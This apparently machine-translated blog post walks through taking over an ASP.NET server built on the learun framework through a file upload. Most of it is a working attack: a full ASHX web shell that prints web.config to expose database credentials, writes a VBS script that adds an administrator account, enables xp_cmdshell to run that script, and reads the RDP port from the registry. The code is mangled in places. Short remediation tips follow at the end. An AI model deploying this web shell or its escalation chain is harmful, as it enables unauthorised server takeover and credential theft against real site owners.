The author of primary school culture, language organization ability is poor, write the place please everyone will look, do not like to spray.
I talked about how to invade the server in the upload file, this time we speak a little bit more.
Let's talk about the process first:
1, upload the code page I uploaded is the ashx page.
2. The Web is displayed as text in the Ashx page. The contents of config are connected to the database,
3. Output VBS script (create Windows account script) in website root directory with ASHX
4, open the database xp_cmdshell.
5. Use database execution to output VBS scripts at the site root directory. The invasion is complete.
Ashx code files are as follows
/// <summary> ///Display configuration Files/// </summary> /// <param name= "context" ></param> Public voidShowwebconfig (HttpContext context) {context. Response.Write (System.IO.File.ReadAllText) (context. Request.mappath ("~/web.config"))); } /// <summary> ///Write VBS script/// </summary> /// <param name= "context" ></param> Public voidWritevbs (HttpContext context) {System.IO.File.WriteAllText (context. Request.mappath ("~/1.vbs"),"set Wsnetwork=createobject (\ "WSCRIPT"). Network\ ") \r\nos=\" winnt://\ "&wsnetwork. Computername\r\nset ob=getobject (OS) ' Get ADSI Interface, bind \r\nset oe=getobject (os&\ "/administrators,group\") ' attribute, admin Group \r\nset Od=ob. Create (\ "User\", \ "test\") ' Create user \r\nod. SetPassword \ "1234\" ' Set password \r\nod. SetInfo ' Save \r\nset of=getobject (os&\ "/test\", user) ' Get user \r\noe.add os&\ '/freeast\ ' \ r \ n"); } /// <summary> ///Linear Database/// </summary> /// <param name= "Connection" ></param> /// <param name= "SQL" ></param> Public voidExecuteSQL (stringConnectionstringSQL) { using(SqlConnection con =NewSqlConnection (Connection)) { using(SqlCommand COMMD =NewSqlCommand (sql, con)) {con. Open (); Commd. ExecuteNonQuery (); Con. Close (); } } } /// <summary> ///linear database and output table/// </summary> /// <param name= "context" ></param> /// <param name= "Connection" ></param> /// <param name= "SQL" ></param> Public voidEXECUTESQL1 (HttpContext context,stringConnectionstringSQL) {System.Data.DataTable table=NewSystem.Data.DataTable (); using(SqlConnection con =NewSqlConnection (Connection)) { using(SqlCommand COMMD =NewSqlCommand (sql, con)) {con. Open (); using(SqlDataAdapter ad =NewSqlDataAdapter (COMMD)) {AD. Fill (table); } con. Close (); } } foreach(System.Data.DataRow rowinchtable. Rows) {foreach(System.Data.DataColumn columninchtable. Columns) {context. Response.Write (Row[column]); Context. Response.Write ("\ t"); } context. Response.Write ("\ r \ n"); } } /// <summary> ///Show Remote Desktop ports/// </summary> /// <param name= "context" ></param> Private voidShowport (HttpContext context) {context. Response.Write (Microsoft.Win32.Registry.LocalMachine.OpenSubKey (@"system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp"). GetValue ("PortNumber"). ToString ()); } Public voidProcessRequest (HttpContext context) {context. Response.ContentType="Text/plain"; Try { varConnection = context. request.querystring["Connection"]; Switch(Context. request.querystring["Method"]) { Case "1": Writevbs (context); Break; Case "2": ExecuteSQL (Connection,@"sp_configure ' show advanced options ', 1 reconfigure"); ExecuteSQL (Connection,@"sp_configure ' xp_cmdshell ', 1 reconfigure");//Open the xp_cmdshell of the database Break; Case "3": EXECUTESQL1 (context, connection,"exec master. xp_cmdshell ' cscript"+ context. Request.mappath ("~/1.vbs") +"'"); Break; Case "4": Showport (context); Break; default: Showwebconfig (context); Break; } } Catch(Exception ex) {context. Response.Write (ex. Message); } context. Response.End (); } Public BOOLisreusable {Get { return false; } }
View Code
Here we take the "learun. Information rapid Development Framework" online button as an example
Upload the file I will not say, the last article someone asked me how to display the Web. Config of the content, I am here to specifically paste the code is actually very simple, file.readalltext Web. config file can be
Public void Showwebconfig (HttpContext context) { context. Response.Write (System.IO.File.ReadAllText) (context. Request.mappath ("~/web.config"))); }
After running the line ashx get the database connection,
The next is the script that creates the Windows account
set wsnetwork=createobject ("WSCRIPT. NETWORK ") os=" winnt://"&wsnetwork. Computernameset ob' Get ADSI Interface, bind set Oe=getobject (os& "/administrators,group") ' attribute, admin group set OD =ob. Create ("user","test") toset up users od. SetPassword "1234""Save set Of=getobject (os&"/test ", user) ' get user oe.add os &"/freeast"
View Code
Then open the xp_cmdshell of the database.
' Show advanced Options ',1 reconfigureGo'xp_cmdshell', 1 Reconfigure
Execute the VBS script at the end
' cscript script file directory '
The results of the operation are as follows:
Well, that means the line is successful .... That is, the server user was added successfully.
Now to start the Remote desktop, so a port scanning tool found that 3389 is off, so it is certain that the port has been modified, then added a code, so that the program to read the Remote Desktop port,
The code is as follows:
/// <summary> ///Show Remote Desktop ports/// </summary> /// <param name= "context" ></param> Private voidShowport (HttpContext context) {context. Response.Write (Microsoft.Win32.Registry.LocalMachine.OpenSubKey (@"system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp"). GetValue ("PortNumber"). ToString ()); }
All right, all done here, open the Remote Desktop Connection.
Because the public has not been in time to inform the victim so he helped the victim to fill up the loophole before the issue, so you do not have to try-.-!!!!
And then I'm talking about the remedy, and I'll just introduce a few
1, the uploaded files to the site, that is to let IIT read (but remember to assign permissions), such as: If my site is placed in D:\\web\oa\ this is my site with the directory, then I upload the file can be put into d:\File\OA inside, others can not directly access
2, is in the upload file directory under the new Web. config to deny all requests, (C # can be read, just need to use response.writefile output)
3, all compression
。。。。。。。。。。。。。。。。
OK, everybody hurry up the previous project to tidy up again, can fill up the .... Don't use these loopholes to do bad things, oh ... So you'll be invited to tea .... -.-!!!!!
ASP. NET website Intrusion Second wave (learun. The rapid development framework of information technology has been won by the author)